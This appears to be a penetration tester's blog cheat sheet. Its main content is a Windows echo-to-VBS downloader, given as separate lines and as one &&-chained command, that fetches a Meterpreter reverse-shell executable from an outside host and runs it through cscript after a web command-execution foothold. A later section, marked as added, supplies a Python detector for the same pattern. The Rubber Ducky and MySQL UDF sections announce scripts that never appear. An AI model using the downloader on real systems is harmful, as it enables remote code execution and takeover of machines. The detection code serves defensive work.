Rubber Ducky

During my recent internal black-box testing, I got a chance to use the Rubber Ducky. This device looks like a USB thumb drive, can be concealed inside a standard USB case, and acts like a keyboard. The script written to the SD card is called Ducky Script, which is very easy to understand.

Since there are a lot of write-ups on the internet about the Ducky, I'll just be posting one of the scripts I used in my recent pentesting. I hope you find it useful.

The script is written keeping in mind that not all Windows installations are the same and that hardware specifications differ as well. While using the default scripts, at times the system was not able to type the complete code, hence you will see many spaces and delays.


Reverse Shell

Download Execute Alternate Method

During a web application pentest performed on a Windows box, we are at times able to upload a web shell and execute commands. The aim is always to get administrator privileges.
I stumbled upon this scenario where I wanted to run a Meterpreter reverse binary through a command execution vulnerability. Since I cannot wget or curl on a Windows box, I found a way through VBS. This let me download and execute an EXE.

 

echo Dim HTTPGET >> localexploit.vbs
echo Set HTTPGET = CreateObject("Microsoft.XMLHTTP") >> localexploit.vbs
echo HTTPGET.Open "GET", "http://192.168.1.10/ring0.exe", false >> localexploit.vbs
echo HTTPGET.Send >> localexploit.vbs
echo DataBin = HTTPGET.ResponseBody >> localexploit.vbs
echo Const adTypeBinary=1 >> localexploit.vbs
echo Const adSaveCreateOverWrite=2 >> localexploit.vbs
echo Dim SendBinary >> localexploit.vbs
echo Set SendBinary = CreateObject("ADODB.Stream") >> localexploit.vbs
echo SendBinary.Type = adTypeBinary >> localexploit.vbs
echo SendBinary.Open >> localexploit.vbs
echo SendBinary.Write DataBin >> localexploit.vbs
echo SendBinary.SaveToFile "ring0.exe", adSaveCreateOverWrite >> localexploit.vbs
cscript //Nologo /B localexploit.vbs

Please see URL : http://ethicalhacking.ninja/?c2b99165d69a5b52#5HMGn0WjBu8HPL1ow88XPr5V/NsXC6Y2W5QWF51fDWE=

This can be combined with local admin exploits to give full control over the machine. The commands can be sent as a single line by joining them with &&. Please see the example below.

 

echo Dim HTTPGET >> localexploit.vbs && echo Set HTTPGET = CreateObject("Microsoft.XMLHTTP") >> localexploit.vbs && echo HTTPGET.Open "GET", "http://192.168.1.10/ring0.exe", false >> localexploit.vbs && echo HTTPGET.Send >> localexploit.vbs && echo DataBin = HTTPGET.ResponseBody >> localexploit.vbs && echo Const adTypeBinary=1 >> localexploit.vbs && echo Const adSaveCreateOverWrite=2 >> localexploit.vbs && echo Dim SendBinary >> localexploit.vbs && echo Set SendBinary = CreateObject("ADODB.Stream") >> localexploit.vbs && echo SendBinary.Type = adTypeBinary >> localexploit.vbs && echo SendBinary.Open >> localexploit.vbs && echo SendBinary.Write DataBin >> localexploit.vbs && echo SendBinary.SaveToFile "ring0.exe", adSaveCreateOverWrite >> localexploit.vbs && cscript //Nologo /B localexploit.vbs

Please see URL : http://ethicalhacking.ninja/?548d4d15053430fd#gpQnTUo6jeaIl0tcU7vW3GatF0IsJ//oomqHkXwtTB8=
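
The staging pattern above as seen from the detection side, as an added example that is not code from the original post: a Python sketch that scans process-creation command lines for a script file assembled by echo redirection with the HTTP and stream COM objects and then run by cscript or wscript. The event tuple format, the w3wp.exe parent image, the function names and the COM names beyond the two used in the post are assumptions.

```python
import re

# Indicators from the technique above: a script assembled with "echo ... >> x.vbs",
# the COM objects it uses to fetch and save a file, and a cscript/wscript run.
SCRIPT_EXT = r'\.(?:vbs|vbe|jse?|wsf)\b'
ECHO_TO_SCRIPT = re.compile(r'\becho\s+(.*?)\s*>>?\s*"?([^\s"&|]+' + SCRIPT_EXT + ')', re.I)
SCRIPT_HOST = re.compile(r'\b[cw]script(?:\.exe)?\b[^&|]*?"?([^\s"&|]+' + SCRIPT_EXT + ')', re.I)
MARKERS = ("microsoft.xmlhttp", "msxml2.xmlhttp", "winhttp.winhttprequest", "adodb.stream")


def base(path):
    """Lower-cased file name without directory, so relative and full paths match."""
    return path.lower().replace("/", "\\").rsplit("\\", 1)[-1]


def find_staged_downloaders(events):
    """events: (parent_image, command_line) tuples in time order.
    Alert when a script built by echo redirection contains download markers
    and is later run by a script host. Covers the line-by-line and && forms."""
    written, alerts = {}, []   # written: script name -> markers echoed into it
    for parent, cmdline in events:
        # Split the chained form on &&, || and & (naive: ignores quoting).
        for part in re.split(r'&&|\|\||&', cmdline):
            m = ECHO_TO_SCRIPT.search(part)
            if m:
                text = m.group(1).lower()
                written.setdefault(base(m.group(2)), set()).update(
                    k for k in MARKERS if k in text)
                continue
            m = SCRIPT_HOST.search(part)
            if m and written.get(base(m.group(1))):
                name = base(m.group(1))
                alerts.append({"script": name, "parent": parent,
                               "markers": sorted(written[name])})
    return alerts


# Constructed sample: process-creation command lines as a logger might record them.
# The parent image name is an assumption; the strings follow the script on this page.
SAMPLE = [
    ("w3wp.exe", 'cmd /c echo Set HTTPGET = CreateObject("Microsoft.XMLHTTP") >> localexploit.vbs'),
    ("w3wp.exe", 'cmd /c echo Set SendBinary = CreateObject("ADODB.Stream") >> localexploit.vbs'),
    ("w3wp.exe", 'cmd /c echo SendBinary.SaveToFile "ring0.exe", adSaveCreateOverWrite >> localexploit.vbs'),
    ("w3wp.exe", 'cmd /c cscript //Nologo /B localexploit.vbs'),
]

if __name__ == "__main__":
    for alert in find_staged_downloaders(SAMPLE):
        print(alert)
```

A script host running a file that was never assembled this way, or an echo-built script with none of the markers, produces no alert, which keeps ordinary administrative scripts out of the results.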

MySQL UDF Injection

While performing web application penetration testing, at times you are able to find out that the web application is accessing its MySQL database with "root" credentials. This is one of the biggest no-nos in security. In this case we can get a root shell on the machine with just a few commands. Here comes my second cheat sheet so that I do not forget this any more.

Web Shell MySQL
